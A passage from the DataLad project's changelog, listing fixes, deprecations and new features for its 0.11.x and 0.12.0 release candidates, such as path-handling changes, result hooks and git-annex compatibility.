indicated with a\n trailing slash rather than interpreting a path as directory when it\n doesn't exist. This avoids confusion that can result from typos and\n makes it possible to support directory targets that do not exist.\n ([#3854][])\n\n- The `dataset_only` argument of the `ConfigManager` class is\n deprecated. Use `source=\"dataset\"` instead. 
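\n\nA minimal Python sketch of the new relative-path semantics described above (paths are hypothetical):\n\n```python\nimport datalad.api as dl\n\n# With a Dataset *instance*, relative paths resolve against the dataset:\nds = dl.Dataset('/tmp/myds')\nds.save(path='some/relpath')  # saves /tmp/myds/some/relpath\n\n# With a string `dataset` argument, relative paths resolve against the\n# current working directory, matching the command-line behavior:\ndl.save(dataset='/tmp/myds', path='some/relpath')  # saves $PWD/some/relpath\n```\n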
([#3907][])\n\n- The `--proc-pre` and `--proc-post` options have been removed, and\n configuration values for `datalad.COMMAND.proc-pre` and\n `datalad.COMMAND.proc-post` are no longer honored. The new result\n hook mechanism provides an alternative for `proc-post`\n procedures. ([#3963][])\n\n## Fixes since 0.12.0rc6\n\n- [publish][] crashed when called with a detached HEAD. It now aborts\n with an informative message. ([#3804][])\n\n- Since 0.12.0rc6 the call to [update][] in [siblings][] resulted in a\n spurious warning. ([#3877][])\n\n- [siblings][] crashed if it encountered an annex repository that was\n marked as dead. ([#3892][])\n\n- The update of [rerun][] in v0.12.0rc3 for the rewritten [diff][]\n command didn't account for a change in the output of `diff`, leading\n to `rerun --report` unintentionally including unchanged files in its\n diff values. ([#3873][])\n\n- In 0.12.0rc5 [download-url][] was updated to follow the new path\n handling logic, but its calls to AnnexRepo weren't properly\n adjusted, resulting in incorrect path handling when the called from\n a dataset subdirectory. ([#3850][])\n\n- [download-url][] called `git annex addurl` in a way that failed to\n register a URL when its header didn't report the content size.\n ([#3911][])\n\n- With Git v2.24.0, saving new subdatasets failed due to a bug in that\n Git release. ([#3904][])\n\n- With DataLad configured to stop on failure (e.g., specifying\n `--on-failure=stop` from the command line), a failing result record\n was not rendered. ([#3863][])\n\n- Installing a subdataset yielded an \"ok\" status in cases where the\n repository was not yet in its final state, making it ineffective for\n a caller to operate on the repository in response to the result.\n ([#3906][])\n\n- The internal helper for converting git-annex's JSON output did not\n relay information from the \"error-messages\" field. ([#3931][])\n\n- [run-procedure][] reported relative paths that were confusingly not\n relative to the current directory in some cases. It now always\n reports absolute paths. ([#3959][])\n\n- [diff][] inappropriately reported files as deleted in some cases\n when `to` was a value other than `None`. ([#3999][])\n\n- An assortment of fixes for Windows compatibility. ([#3971][]) ([#3974][])\n ([#3975][]) ([#3976][]) ([#3979][])\n\n- Subdatasets installed from a source given by relative path will now\n have this relative path used as 'url' in their .gitmodules record,\n instead of an absolute path generated by Git. ([#3538][])\n\n- [clone][] will now correctly interpret '~/...' paths as absolute path\n specifications. ([#3958][])\n\n- [run-procedure][] mistakenly reported a directory as a procedure.\n ([#3793][])\n\n- The cleanup for batched git-annex processes has been improved.\n ([#3794][]) ([#3851][])\n\n- The function for adding a version ID to an AWS S3 URL doesn't\n support URLs with an \"s3://\" scheme and raises a\n `NotImplementedError` exception when it encounters one. The\n function learned to return a URL untouched if an \"s3://\" URL comes\n in with a version ID. ([#3842][])\n\n- A few spots needed to be adjusted for compatibility with git-annex's\n new `--sameas` [feature][gx-sameas], which allows special remotes to\n share a data store. ([#3856][])\n\n- The `swallow_logs` utility failed to capture some log messages due\n to an incompatibility with Python 3.7. ([#3935][])\n\n- [siblings][]\n - crashed if `--inherit` was passed but the parent dataset did not\n have a remote with a matching name. 
([#3954][])\n - configured the wrong pushurl and annexurl values in some\n cases. ([#3955][])\n\n## Enhancements and new features since 0.12.0rc6\n\n- By default, datasets cloned from local source paths will now get a\n configured remote for any recursively discoverable 'origin' sibling that\n is also available from a local path in order to maximize automatic file\n availability across local annexes. ([#3926][])\n\n- The new [result hooks mechanism][hooks] allows callers to specify,\n via local Git configuration values, DataLad command calls that will\n be triggered in response to matching result records (i.e., what you\n see when you call a command with `-f json_pp`). ([#3903][])\n\n- The command interface classes learned to use a new `_examples_`\n attribute to render documentation examples for both the Python and\n command-line API. ([#3821][])\n\n- Candidate URLs for cloning a submodule can now be generated based on\n configured templates that have access to various properties of the\n submodule, including its dataset ID. ([#3828][])\n\n- DataLad's check that the user's Git identity is configured has been\n sped up and now considers the appropriate environment variables as\n well. ([#3807][])\n\n- The `tag` method of `GitRepo` can now tag revisions other than\n `HEAD` and accepts a list of arbitrary `git tag` options.\n ([#3787][])\n\n- When `get` clones a subdataset and the subdataset's HEAD differs\n from the commit that is registered in the parent, the active branch\n of the subdataset is moved to the registered commit if the\n registered commit is an ancestor of the subdataset's HEAD commit.\n This handling has been moved to a more central location within\n `GitRepo`, and now applies to any `update_submodule(..., init=True)`\n call. ([#3831][])\n\n- The output of `datalad -h` has been reformatted to improve\n readability. ([#3862][])\n\n- [unlock][] has been sped up. ([#3880][])\n\n- [run-procedure][] learned to provide and render more information\n about discovered procedures, including whether the procedure is\n overridden by another procedure with the same base name. ([#3960][])\n\n- [save][] now ([#3817][])\n - records the active branch in the superdataset when registering a\n new subdataset.\n - calls `git annex sync` when saving a dataset on an adjusted branch\n so that the changes are brought into the mainline branch.\n\n- [subdatasets][] now aborts when its `dataset` argument points to a\n non-existent dataset. ([#3940][])\n\n- [wtf][] now\n - reports the dataset ID if the current working directory is\n visiting a dataset. ([#3888][])\n - outputs entries deterministically. ([#3927][])\n\n- The `ConfigManager` class\n - learned to exclude `.datalad/config` as a source of\n configuration values, restricting the sources to standard Git\n configuration files, when called with `source=\"local\"`.\n ([#3907][])\n - accepts a value of \"override\" for its `where` argument to allow\n Python callers to more conveniently override configuration.\n ([#3970][])\n\n- Commands now accept a `dataset` value of \"^.\" as shorthand for \"the\n dataset to which the current directory belongs\". ([#3242][])\n\n# 0.12.0rc6 (Oct 19, 2019) -- some releases are better than the others\n\nbet we will fix some bugs and make the world an even better place.\n\n## Major refactoring and deprecations\n\n- DataLad no longer supports Python 2. The minimum supported version\n of Python is now 3.5.
([#3629][])\n\n- Much of the user-focused content at http://docs.datalad.org has been\n removed in favor of more up-to-date and complete material available\n in the [DataLad Handbook][handbook]. Going forward, the plan is to\n restrict http://docs.datalad.org to technical documentation geared\n at developers. ([#3678][])\n\n- [update][] used to allow the caller to specify which dataset(s) to\n update as a `PATH` argument or via the `--dataset` option; now\n only the latter is supported. Path arguments only serve to restrict\n which subdatasets are updated when operating recursively.\n ([#3700][])\n\n- Result records from a [get][] call no longer have a \"state\" key.\n ([#3746][])\n\n- [update][] and [get][] no longer support operating on independent\n hierarchies of datasets. ([#3700][]) ([#3746][])\n\n- The [run][] update in 0.12.0rc4 for the new path resolution logic\n broke the handling of inputs and outputs for calls from a\n subdirectory. ([#3747][])\n\n- The `is_submodule_modified` method of `GitRepo` as well as two\n helper functions in gitrepo.py, `kwargs_to_options` and\n `split_remote_branch`, were no longer used internally or in any\n known DataLad extensions and have been removed. ([#3702][])\n ([#3704][])\n\n- The `only_remote` option of `GitRepo.is_with_annex` was not used\n internally or in any known extensions and has been dropped.\n ([#3768][])\n\n- The `get_tags` method of `GitRepo` used to sort tags by committer\n date. It now sorts them by the tagger date for annotated tags and\n the committer date for lightweight tags. ([#3715][])\n\n- The `rev_resolve_path` helper replaced the `resolve_path` helper. ([#3797][])\n\n\n## Fixes\n\n- Correctly handle relative paths in [publish][]. ([#3799][]) ([#3102][])\n\n- Do not erroneously discover a directory as a procedure. ([#3793][])\n\n- Correctly extract version from manpage to trigger use of manpages for\n `--help`. ([#3798][])\n\n- The `cfg_yoda` procedure saved all modifications in the repository\n rather than saving only the files it modified. ([#3680][])\n\n- Some spots in the documentation that were supposed to appear as two\n hyphens were incorrectly rendered as en-dashes in the HTML output.\n ([#3692][])\n\n- [create][], [install][], and [clone][] treated paths as relative to\n the dataset even when the string form was given, violating the new\n path handling rules. ([#3749][]) ([#3777][]) ([#3780][])\n\n- Providing the \"^\" shortcut to `--dataset` didn't work properly when\n called from a subdirectory of a subdataset. ([#3772][])\n\n- We failed to propagate some errors from git-annex when working with\n its JSON output. ([#3751][])\n\n- With the Python API, callers are allowed to pass a string or list of\n strings as the `cfg_proc` argument to [create][], but the string\n form was mishandled. ([#3761][])\n\n- Incorrect command quoting for SSH calls on Windows rendered basic\n SSH-related functionality (e.g., [sshrun][]) unusable. ([#3688][])\n\n- Annex JSON result handling assumed platform-specific paths on Windows\n instead of the POSIX-style paths that are used across all platforms.\n ([#3719][])\n\n- `path_is_under()` was incapable of comparing Windows paths with different\n drive letters. ([#3728][])\n\n## Enhancements and new features\n\n- Provide a collection of \"public\" `call_git*` helpers within GitRepo\n and replace use of \"private\" and less specific `_git_custom_command`\n calls. ([#3791][])\n\n- [status][] gained a `--report-filetype`.
Setting it to \"raw\" can\n give a performance boost for the price of no longer distinguishing\n symlinks that point to annexed content from other symlinks.\n ([#3701][])\n\n- [save][] disables file type reporting by [status][] to improve\n performance. ([#3712][])\n\n- [subdatasets][] ([#3743][])\n - now extends its result records with a `contains` field that lists\n which `contains` arguments matched a given subdataset.\n - yields an 'impossible' result record when a `contains` argument\n wasn't matched to any of the reported subdatasets.\n\n- [install][] now shows more readable output when cloning fails.\n ([#3775][])\n\n- `SSHConnection` now displays a more informative error message when\n it cannot start the `ControlMaster` process. ([#3776][])\n\n- If the new configuration option `datalad.log.result-level` is set to\n a single level, all result records will be logged at that level. If\n you've been bothered by DataLad's double reporting of failures,\n consider setting this to \"debug\". ([#3754][])\n\n- Configuration values from `datalad -c OPTION=VALUE ...` are now\n validated to provide better errors. ([#3695][])\n\n- [rerun][] learned how to handle history with merges. As was already\n the case when cherry picking non-run commits, re-creating merges may\n result in conflicts, and `rerun` does not yet provide an interface\n to let the user handle these. ([#2754][])\n\n- The `fsck` method of `AnnexRepo` has been enhanced to expose more\n features of the underlying `git annex fsck` command. ([#3693][])\n\n- `GitRepo` now has a `for_each_ref_` method that wraps `git\n for-each-ref`, which is used in various spots that used to rely on\n GitPython functionality. ([#3705][])\n\n- Do not pretend to be able to work in optimized (`python -O`) mode;\n crash early with an informative message. ([#3803][])\n\n# 0.12.0rc5 (September 04, 2019) -- .\n\nVarious fixes and enhancements that bring the 0.12.0 release closer.\n\n## Major refactoring and deprecations\n\n- The two modules below have a new home. The old locations still\n exist as compatibility shims and will be removed in a future\n release.\n - `datalad.distribution.subdatasets` has been moved to\n `datalad.local.subdatasets` ([#3429][])\n - `datalad.interface.run` has been moved to `datalad.core.local.run`\n ([#3444][])\n\n- The `lock` method of `AnnexRepo` and the `options` parameter of\n `AnnexRepo.unlock` were unused internally and have been removed.\n ([#3459][])\n\n- The `get_submodules` method of `GitRepo` has been rewritten without\n GitPython. When the new `compat` flag is true (the current\n default), the method returns a value that is compatible with the old\n return value. This backwards-compatible return value and the\n `compat` flag will be removed in a future release. ([#3508][])\n\n- The logic for resolving relative paths given to a command has\n changed ([#3435][]). The new rule is that relative paths are taken\n as relative to the dataset only if a dataset _instance_ is passed by\n the caller. In all other scenarios they're considered relative to\n the current directory.\n\n The main user-visible difference from the command line is that using\n the `--dataset` argument does _not_ result in relative paths being\n taken as relative to the specified dataset. (The undocumented\n distinction between \"rel/path\" and \"./rel/path\" no longer exists.)\n\n All commands under `datalad.core` and `datalad.local`, as well as\n `unlock` and `addurls`, follow the new logic.
The goal is for all\n commands to eventually do so.\n\n## Fixes\n\n- The function for loading JSON streams wasn't clever enough to handle\n content that included a Unicode line separator like\n U2028. ([#3524][])\n\n- When [unlock][] was called without an explicit target (i.e., a\n directory or no paths at all), the call failed if any of the files\n did not have content present. ([#3459][])\n\n- `AnnexRepo.get_content_info` failed in the rare case of a key\n without size information. ([#3534][])\n\n- [save][] ignored `--on-failure` in its underlying call to\n [status][]. ([#3470][])\n\n- Calling [remove][] with a subdirectory displayed spurious warnings\n about the subdirectory files not existing. ([#3586][])\n\n- Our processing of `git-annex --json` output mishandled info messages\n from special remotes. ([#3546][])\n\n- [create][]\n - didn't bypass the \"existing subdataset\" check when called with\n `--force` as of 0.12.0rc3 ([#3552][])\n - failed to register the up-to-date revision of a subdataset when\n `--cfg-proc` was used with `--dataset` ([#3591][])\n\n- The base downloader had some error handling that wasn't compatible\n with Python 3. ([#3622][])\n\n- Fixed a number of Unicode py2-compatibility issues. ([#3602][])\n\n- `AnnexRepo.get_content_annexinfo` did not properly chunk file\n arguments to avoid exceeding the command-line character limit.\n ([#3587][])\n\n## Enhancements and new features\n\n- New command `create-sibling-gitlab` provides an interface for\n creating a publication target on a GitLab instance. ([#3447][])\n\n- [subdatasets][] ([#3429][])\n - now supports path-constrained queries in the same manner as\n commands like `save` and `status`\n - gained a `--contains=PATH` option that can be used to restrict the\n output to datasets that include a specific path.\n - now narrows the listed subdatasets to those underneath the current\n directory when called with no arguments\n\n- [status][] learned to accept a plain `--annex` (no value) as\n shorthand for `--annex basic`. ([#3534][])\n\n- The `.dirty` property of `GitRepo` and `AnnexRepo` has been sped up.\n ([#3460][])\n\n- The `get_content_info` method of `GitRepo`, used by `status` and\n commands that depend on `status`, now restricts its git calls to a\n subset of files, if possible, for a performance gain in repositories\n with many files. ([#3508][])\n\n- Extensions that do not provide a command, such as those that provide\n only metadata extractors, are now supported. ([#3531][])\n\n- When calling git-annex with `--json`, we log standard error at the\n debug level rather than the warning level if a non-zero exit is\n expected behavior. ([#3518][])\n\n- [create][] no longer refuses to create a new dataset in the odd\n scenario of an empty .git/ directory upstairs. ([#3475][])\n\n- As of v2.22.0 Git treats a sub-repository on an unborn branch as a\n repository rather than as a directory. Our documentation and tests\n have been updated appropriately. ([#3476][])\n\n- [addurls][] learned to accept a `--cfg-proc` value and pass it to\n its `create` calls. ([#3562][])\n\n# 0.12.0rc4 (May 15, 2019) -- the revolution is over\n\nWith the replacement of the `save` command implementation with `rev-save`\nthe revolution effort is now over, and the set of key commands for\nlocal dataset operations (`create`, `run`, `save`, `status`, `diff`) is\n now complete. 
This new core API is available from `datalad.core.local`\n(and also via `datalad.api`, as any other command).\n\n## Major refactoring and deprecations\n\n- The `add` command is now deprecated. It will be removed in a future\n release.\n\n## Fixes\n\n- Remove hard-coded dependencies on POSIX path conventions in SSH support\n code ([#3400][])\n\n- Emit an `add` result when adding a new subdataset during [save][] ([#3398][])\n\n- SSH file transfer now actually opens a shared connection, if none exists\n yet ([#3403][])\n\n## Enhancements and new features\n\n- `SSHConnection` now offers methods for file upload and download (`get()`,\n `put()`. The previous `copy()` method only supported upload and was\n discontinued ([#3401][])\n\n\n# 0.12.0rc3 (May 07, 2019) -- the revolution continues\n\nContinues API consolidation and replaces the `create` and `diff` command\nwith more performant implementations.\n\n## Major refactoring and deprecations\n\n- The previous `diff` command has been replaced by the diff variant\n from the [datalad-revolution][] extension. ([#3366][])\n\n- `rev-create` has been renamed to `create`, and the previous `create`\n has been removed. ([#3383][])\n\n- The procedure `setup_yoda_dataset` has been renamed to `cfg_yoda`\n ([#3353][]).\n\n- The `--nosave` of `addurls` now affects only added content, not\n newly created subdatasets ([#3259][]).\n\n- `Dataset.get_subdatasets` (deprecated since v0.9.0) has been\n removed. ([#3336][])\n\n- The `.is_dirty` method of `GitRepo` and `AnnexRepo` has been\n replaced by `.status` or, for a subset of cases, the `.dirty`\n property. ([#3330][])\n\n- `AnnexRepo.get_status` has been replaced by `AnnexRepo.status`.\n ([#3330][])\n\n## Fixes\n\n- [status][]\n - reported on directories that contained only ignored files ([#3238][])\n - gave a confusing failure when called from a subdataset with an\n explicitly specified dataset argument and \".\" as a path ([#3325][])\n - misleadingly claimed that the locally present content size was\n zero when `--annex basic` was specified ([#3378][])\n\n- An informative error wasn't given when a download provider was\n invalid. ([#3258][])\n\n- Calling `rev-save PATH` saved unspecified untracked subdatasets.\n ([#3288][])\n\n- The available choices for command-line options that take values are\n now displayed more consistently in the help output. ([#3326][])\n\n- The new pathlib-based code had various encoding issues on Python 2.\n ([#3332][])\n\n## Enhancements and new features\n\n- [wtf][] now includes information about the Python version. ([#3255][])\n\n- When operating in an annex repository, checking whether git-annex is\n available is now delayed until a call to git-annex is actually\n needed, allowing systems without git-annex to operate on annex\n repositories in a restricted fashion. ([#3274][])\n\n- The `load_stream` on helper now supports auto-detection of\n compressed files. ([#3289][])\n\n- `create` (formerly `rev-create`)\n - learned to be speedier by passing a path to `status` ([#3294][])\n - gained a `--cfg-proc` (or `-c`) convenience option for running\n configuration procedures (or more accurately any procedure that\n begins with \"cfg_\") in the newly created dataset ([#3353][])\n\n- `AnnexRepo.set_metadata` now returns a list while\n `AnnexRepo.set_metadata_` returns a generator, a behavior which is\n consistent with the `add` and `add_` method pair. ([#3298][])\n\n- `AnnexRepo.get_metadata` now supports batch querying of known annex\n files. 
Note, however, that callers should carefully validate the\n input paths because the batch call will silently hang if given\n non-annex files. ([#3364][])\n\n- [status][]\n - now reports a \"bytesize\" field for files tracked by Git ([#3299][])\n - gained a new option `eval_subdataset_state` that controls how the\n subdataset state is evaluated. Depending on the information you\n need, you can select a less expensive mode to make `status`\n faster. ([#3324][])\n - colors deleted files \"red\" ([#3334][])\n\n- Querying repository content is faster due to batching of `git\n cat-file` calls. ([#3301][])\n\n- The dataset ID of a subdataset is now recorded in the superdataset.\n ([#3304][])\n\n- `GitRepo.diffstatus`\n - now avoids subdataset recursion when the comparison is not with\n the working tree, which substantially improves performance when\n diffing large dataset hierarchies ([#3314][])\n - got smarter and faster about labeling a subdataset as \"modified\"\n ([#3343][])\n\n- `GitRepo.get_content_info` now supports disabling the file type\n evaluation, which gives a performance boost in cases where this\n information isn't needed. ([#3362][])\n\n- The XMP metadata extractor now filters based on file name to improve\n its performance. ([#3329][])\n\n# 0.12.0rc2 (Mar 18, 2019) -- revolution!\n\n## Fixes\n\n- `GitRepo.dirty` does not report on nested empty directories ([#3196][]).\n\n- `GitRepo.save()` reports results on deleted files.\n\n## Enhancements and new features\n\n- Absorb a new set of core commands from the datalad-revolution extension:\n - `rev-status`: like `git status`, but simpler and working with dataset\n hierarchies\n - `rev-save`: a 2-in-1 replacement for save and add\n - `rev-create`: a ~30% faster create\n\n- JSON support tools can now read and write compressed files.\n\n\n# 0.12.0rc1 (Mar 03, 2019) -- to boldly go ...\n\n## Major refactoring and deprecations\n\n- Discontinued support for git-annex direct-mode (also no longer\n supported upstream).\n\n## Enhancements and new features\n\n- Dataset and Repo object instances are now hashable, and can be\n created based on pathlib Path object instances.\n\n- Imported various additional methods for the Repo classes to query\n information and save changes.\n\n\n# 0.11.8 (Oct 11, 2019) -- annex-we-are-catching-up\n\n## Fixes\n\n- Our internal command runner failed to capture output in some cases.\n ([#3656][])\n- Added a workaround in the tests for CPython >= 3.7.5, where a ';' in\n the file name confuses mimetypes ([#3769][]) ([#3770][])\n\n## Enhancements and new features\n\n- Prepared for upstream changes in git-annex, including support for\n the latest git-annex\n - 7.20190912 auto-upgrades v5 repositories to v7. ([#3648][]) ([#3682][])\n - 7.20191009 fixed treatment of (larger/smaller)than in .gitattributes ([#3765][])\n\n- The `cfg_text2git` procedure, as well as the `--text-no-annex` option\n of [create][], now configure .gitattributes so that empty files are\n stored in git rather than annex. ([#3667][])\n\n\n# 0.11.7 (Sep 06, 2019) -- python2-we-still-love-you-but-...\n\nPrimarily bugfixes with some optimizations and refactorings.\n\n## Fixes\n\n- [addurls][]\n - now provides better handling when the URL file isn't in the\n expected format. ([#3579][])\n - always considered a relative file for the URL file argument as\n relative to the current working directory, which goes against the\n convention used by other commands of taking relative paths as\n relative to the dataset argument.
([#3582][])\n\n- [run-procedure][]\n - hard coded \"python\" when formatting the command for non-executable\n procedures ending with \".py\". `sys.executable` is now used.\n ([#3624][])\n - failed if arguments needed more complicated quoting than simply\n surrounding the value with double quotes. This has been resolved\n for systems that support `shlex.quote`, but note that on Windows\n values are left unquoted. ([#3626][])\n\n- [siblings][] now displays an informative error message if a local\n path is given to `--url` but `--name` isn't specified. ([#3555][])\n\n- [sshrun][], the command DataLad uses for `GIT_SSH_COMMAND`, didn't\n support all the parameters that Git expects it to. ([#3616][])\n\n- Fixed a number of Unicode py2-compatibility issues. ([#3597][])\n\n- [download-url][] now will create leading directories of the output path\n if they do not exist ([#3646][])\n\n## Enhancements and new features\n\n- The [annotate-paths][] helper now caches subdatasets it has seen to\n avoid unnecessary calls. ([#3570][])\n\n- A repeated configuration query has been dropped from the handling of\n `--proc-pre` and `--proc-post`. ([#3576][])\n\n- Calls to `git annex find` now use `--in=.` instead of the alias\n `--in=here` to take advantage of an optimization that git-annex (as\n of the current release, 7.20190730) applies only to the\n former. ([#3574][])\n\n- [addurls][] now suggests close matches when the URL or file format\n contains an unknown field. ([#3594][])\n\n- Shared logic used in the setup.py files of DataLad and its\n extensions has been moved to modules in the _datalad_build_support/\n directory. ([#3600][])\n\n- Get ready for upcoming git-annex dropping support for direct mode\n ([#3631][])\n\n\n# 0.11.6 (Jul 30, 2019) -- am I the last of 0.11.x?\n\nPrimarily bug fixes to achieve more robust performance\n\n## Fixes\n\n- Our tests needed various adjustments to keep up with upstream\n changes in Travis and Git. ([#3479][]) ([#3492][]) ([#3493][])\n\n- `AnnexRepo.is_special_annex_remote` was too selective in what it\n considered to be a special remote. ([#3499][])\n\n- We now provide information about unexpected output when git-annex is\n called with `--json`. ([#3516][])\n\n- Exception logging in the `__del__` method of `GitRepo` and\n `AnnexRepo` no longer fails if the names it needs are no longer\n bound. ([#3527][])\n\n- [addurls][] botched the construction of subdataset paths that were\n more than two levels deep and failed to create datasets in a\n reliable, breadth-first order. ([#3561][])\n\n- Cloning a `type=git` special remote showed a spurious warning about\n the remote not being enabled. ([#3547][])\n\n## Enhancements and new features\n\n- For calls to git and git-annex, we disable automatic garbage\n collection due to past issues with GitPython's state becoming stale,\n but doing so results in a larger .git/objects/ directory that isn't\n cleaned up until garbage collection is triggered outside of DataLad.\n Tests with the latest GitPython didn't reveal any state issues, so\n we've re-enabled automatic garbage collection. ([#3458][])\n\n- [rerun][] learned an `--explicit` flag, which it relays to its calls\n to [run][[]]. This makes it possible to call `rerun` in a dirty\n working tree ([#3498][]).\n\n- The [metadata][] command aborts earlier if a metadata extractor is\n unavailable. 
([#3525][])\n\n# 0.11.5 (May 23, 2019) -- stability is not overrated\n\nShould be faster and less buggy, with a few enhancements.\n\n## Fixes\n\n- [create-sibling][] ([#3318][])\n - Siblings are no longer configured with a post-update hook unless a\n web interface is requested with `--ui`.\n - `git submodule update --init` is no longer called from the\n post-update hook.\n - If `--inherit` is given for a dataset without a superdataset, a\n warning is now given instead of raising an error.\n- The internal command runner failed on Python 2 when its `env`\n argument had unicode values. ([#3332][])\n- The safeguard that prevents creating a dataset in a subdirectory\n that already contains tracked files for another repository failed on\n Git versions before 2.14. For older Git versions, we now warn the\n caller that the safeguard is not active. ([#3347][])\n- A regression introduced in v0.11.1 prevented [save][] from committing\n changes under a subdirectory when the subdirectory was specified as\n a path argument. ([#3106][])\n- A workaround introduced in v0.11.1 made it possible for [save][] to\n do a partial commit with an annex file that has gone below the\n `annex.largefiles` threshold. The logic of this workaround was\n faulty, leading to files being displayed as typechanged in the index\n following the commit. ([#3365][])\n- The resolve_path() helper confused paths that had a semicolon for\n SSH RIs. ([#3425][])\n- The detection of SSH RIs has been improved. ([#3425][])\n\n## Enhancements and new features\n\n- The internal command runner was too aggressive in its decision to\n sleep. ([#3322][])\n- The \"INFO\" label in log messages now retains the default text color\n for the terminal rather than using white, which only worked well for\n terminals with dark backgrounds. ([#3334][])\n- A short flag `-R` is now available for the `--recursion-limit` flag,\n a flag shared by several subcommands. ([#3340][])\n- The authentication logic for [create-sibling-github][] has been\n revamped and now supports 2FA. ([#3180][])\n- New configuration option `datalad.ui.progressbar` can be used to\n configure the default backend for progress reporting (\"none\", for\n example, results in no progress bars being shown). ([#3396][])\n- A new progress backend, available by setting datalad.ui.progressbar\n to \"log\", replaces progress bars with a log message upon completion\n of an action. ([#3396][])\n- DataLad learned to consult the [NO_COLOR][] environment variable and\n the new `datalad.ui.color` configuration option when deciding to\n color output. The default value, \"auto\", retains the current\n behavior of coloring output if attached to a TTY ([#3407][]).\n- [clean][] now removes annex transfer directories, which is useful\n for cleaning up failed downloads. ([#3374][])\n- [clone][] no longer refuses to clone into a local path that looks\n like a URL, making its behavior consistent with `git clone`.\n ([#3425][])\n- [wtf][]\n - Learned to fall back to the `dist` package if `platform.dist`,\n which has been removed in the yet-to-be-release Python 3.8, does\n not exist. ([#3439][])\n - Gained a `--section` option for limiting the output to specific\n sections and a `--decor` option, which currently knows how to\n format the output as GitHub's `<details>` section. 
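\n\nFor the reporting options above, a minimal Python sketch of setting them globally; this assumes the ConfigManager `set` API, and `git config --global` achieves the same effect:\n\n```python\nfrom datalad import cfg\n\n# Replace progress bars with a single log message per completed action\ncfg.set('datalad.ui.progressbar', 'log', where='global')\n\n# Keep the default of coloring output only when attached to a TTY,\n# while honoring the NO_COLOR environment variable\ncfg.set('datalad.ui.color', 'auto', where='global')\n```\n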
([#3440][])\n\n# 0.11.4 (Mar 18, 2019) -- get-ready\n\nLargely a bug fix release with a few enhancements\n\n## Important\n\n- 0.11.x series will be the last one with support for direct mode of [git-annex][]\n which is used on crippled (no symlinks and no locking) filesystems.\n v7 repositories should be used instead.\n\n## Fixes\n\n- Extraction of .gz files is broken without p7zip installed. We now\n abort with an informative error in this situation. ([#3176][])\n\n- Committing failed in some cases because we didn't ensure that the\n path passed to `git read-tree --index-output=...` resided on the\n same filesystem as the repository. ([#3181][])\n\n- Some pointless warnings during metadata aggregation have been\n eliminated. ([#3186][])\n\n- With Python 3 the LORIS token authenticator did not properly decode\n a response ([#3205][]).\n\n- With Python 3 downloaders unnecessarily decoded the response when\n getting the status, leading to an encoding error. ([#3210][])\n\n- In some cases, our internal command Runner did not adjust the\n environment's `PWD` to match the current working directory specified\n with the `cwd` parameter. ([#3215][])\n\n- The specification of the pyliblzma dependency was broken. ([#3220][])\n\n- [search] displayed an uninformative blank log message in some\n cases. ([#3222][])\n\n- The logic for finding the location of the aggregate metadata DB\n anchored the search path incorrectly, leading to a spurious warning.\n ([#3241][])\n\n- Some progress bars were still displayed when stdout and stderr were\n not attached to a tty. ([#3281][])\n\n- Check for stdin/out/err to not be closed before checking for `.isatty`.\n ([#3268][])\n\n## Enhancements and new features\n\n- Creating a new repository now aborts if any of the files in the\n directory are tracked by a repository in a parent directory.\n ([#3211][])\n\n- [run] learned to replace the `{tmpdir}` placeholder in commands with\n a temporary directory. ([#3223][])\n \n- [duecredit][] support has been added for citing DataLad itself as\n well as datasets that an analysis uses. ([#3184][])\n\n- The `eval_results` interface helper unintentionally modified one of\n its arguments. ([#3249][])\n\n- A few DataLad constants have been added, changed, or renamed ([#3250][]):\n - `HANDLE_META_DIR` is now `DATALAD_DOTDIR`. The old name should be\n considered deprecated.\n - `METADATA_DIR` now refers to `DATALAD_DOTDIR/metadata` rather than\n `DATALAD_DOTDIR/meta` (which is still available as\n `OLDMETADATA_DIR`).\n - The new `DATASET_METADATA_FILE` refers to `METADATA_DIR/dataset.json`.\n - The new `DATASET_CONFIG_FILE` refers to `DATALAD_DOTDIR/config`.\n - `METADATA_FILENAME` has been renamed to `OLDMETADATA_FILENAME`.\n\n# 0.11.3 (Feb 19, 2019) -- read-me-gently\n\nJust a few of important fixes and minor enhancements.\n\n## Fixes\n\n- The logic for setting the maximum command line length now works\n around Python 3.4 returning an unreasonably high value for\n `SC_ARG_MAX` on Debian systems. ([#3165][])\n\n- DataLad commands that are conceptually \"read-only\", such as\n `datalad ls -L`, can fail when the caller lacks write permissions\n because git-annex tries merging remote git-annex branches to update\n information about availability. DataLad now disables\n `annex.merge-annex-branches` in some common \"read-only\" scenarios to\n avoid these failures. 
([#3164][])\n\n## Enhancements and new features\n\n- Accessing an \"unbound\" dataset method now automatically imports the\n necessary module rather than requiring an explicit import from the\n Python caller. For example, calling `Dataset.add` no longer needs to\n be preceded by `from datalad.distribution.add import Add` or an\n import of `datalad.api`. ([#3156][])\n\n- Configuring the new variable `datalad.ssh.identityfile` instructs\n DataLad to pass a value to the `-i` option of `ssh`. ([#3149][])\n ([#3168][])\n\n# 0.11.2 (Feb 07, 2019) -- live-long-and-prosper\n\nA variety of bugfixes and enhancements\n\n## Major refactoring and deprecations\n\n- All extracted metadata is now placed under git-annex by default.\n Previously files smaller than 20 kb were stored in git. ([#3109][])\n- The function `datalad.cmd.get_runner` has been removed. ([#3104][])\n\n## Fixes\n\n- Improved handling of long commands:\n - The code that inspected `SC_ARG_MAX` didn't check that the\n reported value was a sensible, positive number. ([#3025][])\n - More commands that invoke `git` and `git-annex` with file\n arguments learned to split up the command calls when it is likely\n that the command would fail due to exceeding the maximum supported\n length. ([#3138][])\n- The `setup_yoda_dataset` procedure created a malformed\n .gitattributes line. ([#3057][])\n- [download-url][] unnecessarily tried to infer the dataset when\n `--no-save` was given. ([#3029][])\n- [rerun][] aborted too late and with a confusing message when a ref\n specified via `--onto` didn't exist. ([#3019][])\n- [run][]:\n - `run` didn't preserve the current directory prefix (\"./\") on\n inputs and outputs, which is problematic if the caller relies on\n this representation when formatting the command. ([#3037][])\n - Fixed a number of unicode py2-compatibility issues. ([#3035][]) ([#3046][])\n - To proceed with a failed command, the user was confusingly\n instructed to use `save` instead of `add` even though `run` uses\n `add` underneath. ([#3080][])\n- Fixed a case where the helper class for checking external modules\n incorrectly reported a module as unknown. ([#3051][])\n- [add-archive-content][] mishandled the archive path when the leading\n path contained a symlink. ([#3058][])\n- Following denied access, the credential code failed to consider a\n scenario, leading to a type error rather than an appropriate error\n message. ([#3091][])\n- Some tests failed when executed from a `git worktree` checkout of the\n source repository. ([#3129][])\n- During metadata extraction, batched annex processes weren't properly\n terminated, leading to issues on Windows. ([#3137][])\n- [add][] incorrectly handled an \"invalid repository\" exception when\n trying to add a submodule. ([#3141][])\n- Pass 